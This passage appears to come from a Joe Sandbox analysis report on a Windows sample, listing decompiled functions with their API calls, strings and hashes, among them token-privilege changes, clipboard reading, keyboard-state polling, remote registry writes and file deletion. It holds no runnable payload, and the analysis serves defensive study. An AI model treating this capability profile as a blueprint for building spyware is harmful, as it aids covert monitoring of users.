Part of subcall function 00D58CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D58D3A
Part of subcall function 00D58CC3: GetLastError.KERNEL32 ref: 00D58D47

_memset.LIBCMT ref: 00D5889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00D588ED
CloseHandle.KERNEL32(?), ref: 00D588FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D58915
GetProcessWindowStation.USER32 ref: 00D5892E
SetProcessWindowStation.USER32(00000000), ref: 00D58938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D58952

Part of subcall function 00D58713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D58851), ref: 00D58728
Part of subcall function 00D58713: CloseHandle.KERNEL32(?,?,00D58851), ref: 00D5873A

Strings

, xrefs: 00D588AA
default, xrefs: 00D5894D
winsta0, xrefs: 00D58910

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: bc7f0989981b3519c817561bca8dfb4ac841c7a943e6e930028d9815930593ca
Instruction ID: 72aa65aedaaf52dacb7ddc6cd9aab7f77162c5e7e548df0833f0aedb73a6475a
Opcode Fuzzy Hash: bc7f0989981b3519c817561bca8dfb4ac841c7a943e6e930028d9815930593ca
Instruction Fuzzy Hash: D9812C71900249AFDF11DFA4DD45AEEBBB8EF04306F18416AFD11B6261DB318E19AB70

Function 00D7425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00D8F910), ref: 00D74284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00D74292
GetClipboardData.USER32(0000000D), ref: 00D7429A
CloseClipboard.USER32 ref: 00D742A6
GlobalLock.KERNEL32(00000000), ref: 00D742C2
CloseClipboard.USER32 ref: 00D742CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00D742E1
IsClipboardFormatAvailable.USER32(00000001), ref: 00D742EE
GetClipboardData.USER32(00000001), ref: 00D742F6
GlobalLock.KERNEL32(00000000), ref: 00D74303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00D74337
CloseClipboard.USER32 ref: 00D74447

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 47d90003c37228dec8ed8bb16475523c66bd9a066a1e74750854eb21e3279160
Instruction ID: 136c68c23999ad6e69cf6c6d3fb44f088e5029bf9c2ea0bba35eabcbf9b78131
Opcode Fuzzy Hash: 47d90003c37228dec8ed8bb16475523c66bd9a066a1e74750854eb21e3279160
Instruction Fuzzy Hash: 4B518271204302ABD701BF64EC96F6E77A8EF84B10F144529F999D62E2EF70D9048B76

Function 00D6C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00D6C9F8
FindClose.KERNEL32(00000000), ref: 00D6CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D6CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D6CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6CAAF
__swprintf.LIBCMT ref: 00D6CAFB
__swprintf.LIBCMT ref: 00D6CB3E

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

__swprintf.LIBCMT ref: 00D6CB92

Part of subcall function 00D238D8: __woutput_l.LIBCMT ref: 00D23931

__swprintf.LIBCMT ref: 00D6CBE0

Part of subcall function 00D238D8: __flsbuf.LIBCMT ref: 00D23953
Part of subcall function 00D238D8: __flsbuf.LIBCMT ref: 00D2396B

__swprintf.LIBCMT ref: 00D6CC2F
__swprintf.LIBCMT ref: 00D6CC7E
__swprintf.LIBCMT ref: 00D6CCCD

Strings

%02d, xrefs: 00D6CB86, 00D6CB90, 00D6CBDE, 00D6CC2D, 00D6CC7C, 00D6CCCB
%4d%02d%02d%02d%02d%02d, xrefs: 00D6CAF5
%4d, xrefs: 00D6CB38

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 93d499d1942832d589155b877f44ce6ba4ea8a234d0e3f349357e7b35e0b6c06
Instruction ID: 8f39981ea7d9446677d2d4dc41eea2f1fb94174981250e22fa768c0e8471b720
Opcode Fuzzy Hash: 93d499d1942832d589155b877f44ce6ba4ea8a234d0e3f349357e7b35e0b6c06
Instruction Fuzzy Hash: 7FA111B1518305ABC710EB64D895EAFB7ECEF94704F40491DF589C7192EA34EA48CB72

Function 00D6F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00D6F221
_wcscmp.LIBCMT ref: 00D6F236
_wcscmp.LIBCMT ref: 00D6F24D
GetFileAttributesW.KERNEL32(?), ref: 00D6F25F
SetFileAttributesW.KERNEL32(?,?), ref: 00D6F279
FindNextFileW.KERNEL32(00000000,?), ref: 00D6F291
FindClose.KERNEL32(00000000), ref: 00D6F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 00D6F2B8
_wcscmp.LIBCMT ref: 00D6F2DF
_wcscmp.LIBCMT ref: 00D6F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 00D6F308
SetCurrentDirectoryW.KERNEL32(00DBA5A0), ref: 00D6F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 00D6F330
FindClose.KERNEL32(00000000), ref: 00D6F33D
FindClose.KERNEL32(00000000), ref: 00D6F34F

Strings

*.*, xrefs: 00D6F2B3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: c86aff451e6b941dc41c33348cc3a1f68aed261b9a17cd5ba0b08849abce0374
Instruction ID: a642173ae421416d5727a2a485d67f35f30aa6da9389df59383f22eed2f033dd
Opcode Fuzzy Hash: c86aff451e6b941dc41c33348cc3a1f68aed261b9a17cd5ba0b08849abce0374
Instruction Fuzzy Hash: 6831B0765016196FDF20DBB4EC59ADE73ACEF48361F140175E810D32A0EB30DA458B74

Function 00D80AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D80BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00D8F910,00000000,?,00000000,?,?), ref: 00D80C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00D80C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00D80D1D
RegCloseKey.ADVAPI32(?), ref: 00D8103D
RegCloseKey.ADVAPI32(00000000), ref: 00D8104A

Strings

REG_DWORD, xrefs: 00D80F0E
REG_EXPAND_SZ, xrefs: 00D80CBA
REG_SZ, xrefs: 00D80D5B
REG_MULTI_SZ, xrefs: 00D80E05
REG_BINARY, xrefs: 00D80FD8
REG_QWORD, xrefs: 00D80F8B

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 9a67f4454855c40481aee532fedb79e6208a9ae8398bccc04b2924599d65ee50
Instruction ID: a17c143243644e0d411ca0f3bc20f4dba7207a927ddf8956bb740f87c486fe15
Opcode Fuzzy Hash: 9a67f4454855c40481aee532fedb79e6208a9ae8398bccc04b2924599d65ee50
Instruction Fuzzy Hash: D5025F752006119FCB14EF28D895E2ABBE5FF89714F04845DF88A9B3A2CB70ED45CB61

Function 00D6F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00D6F37E
_wcscmp.LIBCMT ref: 00D6F393
_wcscmp.LIBCMT ref: 00D6F3AA

Part of subcall function 00D645C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D645DC

FindNextFileW.KERNEL32(00000000,?), ref: 00D6F3D9
FindClose.KERNEL32(00000000), ref: 00D6F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 00D6F400
_wcscmp.LIBCMT ref: 00D6F427
_wcscmp.LIBCMT ref: 00D6F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 00D6F450
SetCurrentDirectoryW.KERNEL32(00DBA5A0), ref: 00D6F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00D6F478
FindClose.KERNEL32(00000000), ref: 00D6F485
FindClose.KERNEL32(00000000), ref: 00D6F497

Strings

*.*, xrefs: 00D6F3FB

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: ff6945a16aa6ead905dae35616aa88341264eb0f5383a3f602699a5a79bbc5bc
Instruction ID: 03fcab4976383dfdd1192938762f38598beb60066e12ca65ed4a69a78365ac7f
Opcode Fuzzy Hash: ff6945a16aa6ead905dae35616aa88341264eb0f5383a3f602699a5a79bbc5bc
Instruction Fuzzy Hash: E831C3725016196FCF20ABA4FC88ADE77ACDF49364F140175E850E31A0DB35EA44CB74

Function 00D581F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D58766
Part of subcall function 00D5874A: GetLastError.KERNEL32(?,00D5822A,?,?,?), ref: 00D58770
Part of subcall function 00D5874A: GetProcessHeap.KERNEL32(00000008,?,?,00D5822A,?,?,?), ref: 00D5877F
Part of subcall function 00D5874A: HeapAlloc.KERNEL32(00000000,?,00D5822A,?,?,?), ref: 00D58786
Part of subcall function 00D5874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D5879D

Part of subcall function 00D587E7: GetProcessHeap.KERNEL32(00000008,00D58240,00000000,00000000,?,00D58240,?), ref: 00D587F3
Part of subcall function 00D587E7: HeapAlloc.KERNEL32(00000000,?,00D58240,?), ref: 00D587FA
Part of subcall function 00D587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00D58240,?), ref: 00D5880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D5825B
_memset.LIBCMT ref: 00D58270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D5828F
GetLengthSid.ADVAPI32(?), ref: 00D582A0
GetAce.ADVAPI32(?,00000000,?), ref: 00D582DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D582F9
GetLengthSid.ADVAPI32(?), ref: 00D58316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00D58325
HeapAlloc.KERNEL32(00000000), ref: 00D5832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D5834D
CopySid.ADVAPI32(00000000), ref: 00D58354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D58385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D583AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D583BF

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: d6c434f9dcec244c3b1c58703771ec2be636489962f1c3ed952e0a199316003c
Instruction ID: 8c3c411f4017cee6993153c0aaa1a2eb5f7241478e101b4959d1b12bfd4c18fe
Opcode Fuzzy Hash: d6c434f9dcec244c3b1c58703771ec2be636489962f1c3ed952e0a199316003c
Instruction Fuzzy Hash: 27613871A00209AFEF009FA4DC85EAEBBB9FF04705F148169EC15E7291DB359A19DB70

Function 00D16843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

CR), xrefs: 00D516C0
ANYCRLF), xrefs: 00D51734
BSR_ANYCRLF), xrefs: 00D51757
LIMIT_MATCH=, xrefs: 00D515A9
CRLF), xrefs: 00D516FA
BSR_UNICODE), xrefs: 00D51771
LIMIT_RECURSION=, xrefs: 00D51635
LF), xrefs: 00D516DD
ANY), xrefs: 00D51717
UTF16), xrefs: 00D51508
NO_START_OPT), xrefs: 00D51588
UTF), xrefs: 00D51533
NO_AUTO_POSSESS), xrefs: 00D51567
UCP), xrefs: 00D51546

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 9d1c95f18dd609475a0688fbaf776c12244802045bea276fcd09b10e2cb82605
Instruction ID: a3c7760cc80d4456e5d89682813066ac828d7d0decec53e2f7d1aa1b754de432
Opcode Fuzzy Hash: 9d1c95f18dd609475a0688fbaf776c12244802045bea276fcd09b10e2cb82605
Instruction Fuzzy Hash: 45724D75E002199BDF24CF59D8807EEB7B5EF48711F18816AEC55EB280EB70D985CBA0

Function 00D80665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D80038,?,?), ref: 00D810BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D80737

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D807D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00D8086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00D80AAD
RegCloseKey.ADVAPI32(00000000), ref: 00D80ABA

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 0aae269281ad1079acc76a5b76932d51b7d34e69d427a33bc52a2493aed6d77f
Instruction ID: ce2ac808832205adc3fcd8f3b0052a5d8a7af8287a7c642193dad23da7b927e2
Opcode Fuzzy Hash: 0aae269281ad1079acc76a5b76932d51b7d34e69d427a33bc52a2493aed6d77f
Instruction Fuzzy Hash: AFE13031204310AFCB54EF28C895E6ABBE4EF89714F04856DF459DB2A2DB30ED45CB61

Function 00D60219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00D60241
GetAsyncKeyState.USER32(000000A0), ref: 00D602C2
GetKeyState.USER32(000000A0), ref: 00D602DD
GetAsyncKeyState.USER32(000000A1), ref: 00D602F7
GetKeyState.USER32(000000A1), ref: 00D6030C
GetAsyncKeyState.USER32(00000011), ref: 00D60324
GetKeyState.USER32(00000011), ref: 00D60336
GetAsyncKeyState.USER32(00000012), ref: 00D6034E
GetKeyState.USER32(00000012), ref: 00D60360
GetAsyncKeyState.USER32(0000005B), ref: 00D60378
GetKeyState.USER32(0000005B), ref: 00D6038A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 027f7a7c56c206e282e300d3f896df537a1a218592571a81801e05ced6ec5390
Instruction ID: 9d39360739d3820d2427d59da9a8f7ded236788425644a7dbfce4c4c84f8a268
Opcode Fuzzy Hash: 027f7a7c56c206e282e300d3f896df537a1a218592571a81801e05ced6ec5390
Instruction Fuzzy Hash: AE4195345147C96FFF319B6488183A7BEA0AF16345F0C409DD5C6867C2EB949DC887B6

Function 00D786D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

CoInitialize.OLE32 ref: 00D78718
CoUninitialize.OLE32 ref: 00D78723
CoCreateInstance.OLE32(?,00000000,00000017,00D92BEC,?), ref: 00D78783
IIDFromString.OLE32(?,?), ref: 00D787F6
VariantInit.OLEAUT32(?), ref: 00D78890
VariantClear.OLEAUT32(?), ref: 00D788F1

Strings

NULL Pointer assignment, xrefs: 00D787C8
Invalid parameter, xrefs: 00D7880F
Failed to create object, xrefs: 00D7878E, 00D78844

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 436fb01be752c72a2f834a1080d822a01ca682a0333624afd90962353c015bb9
Instruction ID: 39326bfbcf7c8a0b55a08e6bbb5b1901b5fb478355898ac2a81f5b60e7454cd2
Opcode Fuzzy Hash: 436fb01be752c72a2f834a1080d822a01ca682a0333624afd90962353c015bb9
Instruction Fuzzy Hash: D561CF706483119FC710DF24D849B6ABBE4EF48714F14881DF88A9B291EB70ED48DBB2

Function 00D74458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00D7447F
EmptyClipboard.USER32 ref: 00D74485
GlobalAlloc.KERNEL32(00000002,?), ref: 00D7449A
CloseClipboard.USER32 ref: 00D74539

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 70d9851bc91fb01972a8a6484f04520233b80b066117d26b762e06b8d1ae9ac5
Instruction ID: e89cfe6df52ad08810970a8a0e3c783f235b4a0c1602f6186d2c12dd9c5dea65
Opcode Fuzzy Hash: 70d9851bc91fb01972a8a6484f04520233b80b066117d26b762e06b8d1ae9ac5
Instruction Fuzzy Hash: E3216D35210211AFDB11AF64EC59B69B7A8EF04715F14802AF94ADB3A2EB74ED00CB74

Function 00D63A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D048A1,?,?,00D037C0,?), ref: 00D048CE

Part of subcall function 00D64CD3: GetFileAttributesW.KERNEL32(?,00D63947), ref: 00D64CD4

FindFirstFileW.KERNEL32(?,?), ref: 00D63ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00D63B87
MoveFileW.KERNEL32(?,?), ref: 00D63B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00D63BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00D63BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00D63BF5

Strings

\*.*, xrefs: 00D63A8A, 00D63A93, 00D63AA8

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: deffffd4806e5bb2253936f4bf5765b9c4522b488f1860c20cb115bf73419ea2
Instruction ID: cf9b4f21f5b22eb63df58ce1f99f1d88022711feca7042ce380bb16b26f0152d
Opcode Fuzzy Hash: deffffd4806e5bb2253936f4bf5765b9c4522b488f1860c20cb115bf73419ea2
Instruction Fuzzy Hash: D5515F31905249ABCF15EBA4DE92AEEB778EF14300F644169E446B7191DF316F09CBB0

Function 00D6F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

